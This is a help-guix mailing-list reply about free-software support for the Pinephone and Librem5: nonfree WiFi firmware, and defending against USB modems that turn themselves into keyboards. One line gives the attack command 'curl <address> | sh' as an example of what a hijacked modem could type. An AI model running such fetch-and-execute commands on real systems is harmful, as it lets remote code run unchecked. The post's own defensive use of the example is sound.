help-guix
[Top][All Lists]
Advanced

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Guix on the MNT Reform


From: Denis 'GNUtoo' Carikli
Subject: Re: Guix on the MNT Reform
Date: Thu, 9 Sep 2021 16:10:46 +0200

On Wed, 08 Sep 2021 09:47:02 -0700
Vagrant Cascadian <vagrant@debian.org> wrote:

> On 2021-09-08, Christine Lemmer-Webber wrote:
> > Denis 'GNUtoo' Carikli <GNUtoo@cyberdimension.org> writes:
> >> Here this I'MX8 issue also affect the Librem5 for instance, and
> >> probably several other devices as well. And the neat thing about
> >> the Librem 5 is that as I understand is that the modem and the
> >> WiFi cards are removable.
> >
> > I am guessing the Pinephone has a similar issue (or more) though
> > I'm not sure.
> 
> The Pinephone doesn't have that specific issue, as it's a different
> CPU (Allwinner A64), the same used on the pine64+ and pinebook, which
> are supported in Guix's u-boot. I vaguely recall those boards having
> similar types of issues early on requiring some binary blobs, but it
> was fixed in u-boot upstream with a free implementation!

WiFi:
-----
For any FSDG compliant distribution, the issue with the Pinephone will
be the WiFi: the WiFi driver requires a nonfree firmware.

There might be a way around that though: There are various Realtek
drivers that are released as GPL with the binary firmware as hex arrays
inside the drivers, in files with GPL headers.

And I even managed to find someone at an event (CCC Camp) that did a
little bit of reverse engineering on one of such binary firmwares.

Since we have GPL headers, we should be legally safe here and almost
everything should be permitted, including decompilation, automatic
reconstruction of corresponding source code, etc.

However the firmware architecture (8051) is less well supported by some
of the tools like retdec for instance, but we still have tools
like radare2, or sdcc that support it. And we even probably have several
emulators for that architecture as well.

Modem:
------
There is also another issue that affects several smartphones like the
Librem5, the GTA04 (if I recall well), and the Pinephone, but it's not
directly related to FSDG distributions: the modem is connected through
USB. It also affects some laptops with (potentially builtin) USB modems.

While it's order of magnitude better than most phones that have shared
memory[2], we still need to protect against the modem being potentially
malicious.

To do that we might need to enable usbguard or similar things and
disable usb in u-boot for instance, to be sure that the modem can't
become a keyboard.

On some devices it might be really easy for an attacker to make the
modem become a keyboard as in some cases the modem is really a
smartphone on a chip[3], and so it has some mix of Android and GNU/Linux
running in one of its processor (and probably nonfree modem firmwares /
OS running on the other processors).

So on the GNU/Linux side of the modem you can probably reconfigure the
USB peripheral to also be a keyboard. And it might not be that hard for
attackers to find vulnerabilities in the modem cellular stack and
escalate to the GNU/Linux part of the modem[4].

Once there, the attacker wound't be able to reconfigure the modem as a
keyboard and run commands with 'Alt+F2 + curl <address> | sh' if
usbguard blocks the USB reconfiguration of the modem.

And while that kind of risk might not affect everybody, I think it
would still be a good idea to address them as sometimes compromise of
smartphones can lead to people being killed by repressive political
regimes[5]. And it would be a bad thing if these people wound't be able
to use free software because of security reasons.

And here GNU/Linux has probably way more potential to achieve that than
Android in the long run due to its architecture and code quality.

References:
-----------
[1]https://libreplanet.org/wiki/Group:Hardware/research/WiFi/Realtek
[2]https://redmine.replicant.us/projects/replicant/wiki/ModemIsolationResearch
[3]https://osmocom.org/projects/quectel-modems/wiki/Pine64_Pinephone
[4]https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20video%20and%20slides/DEF%20CON%2027%20Conference%20-%20Xiling%20Gong%20-%20Exploiting%20Qualcomm%20WLAN%20and%20Modem%20Over%20The%20Air.mp4
[5]Typically smartphones and computers of dissident living abroad are
   targeted in order to find out who they work with in the repressive
   country in order to kill / torture / imprison these people.

Denis.

Attachment: pgpQKd3GRySt3.pgp
Description: OpenPGP digital signature


reply via email to

[Prev in Thread] Current Thread [Next in Thread]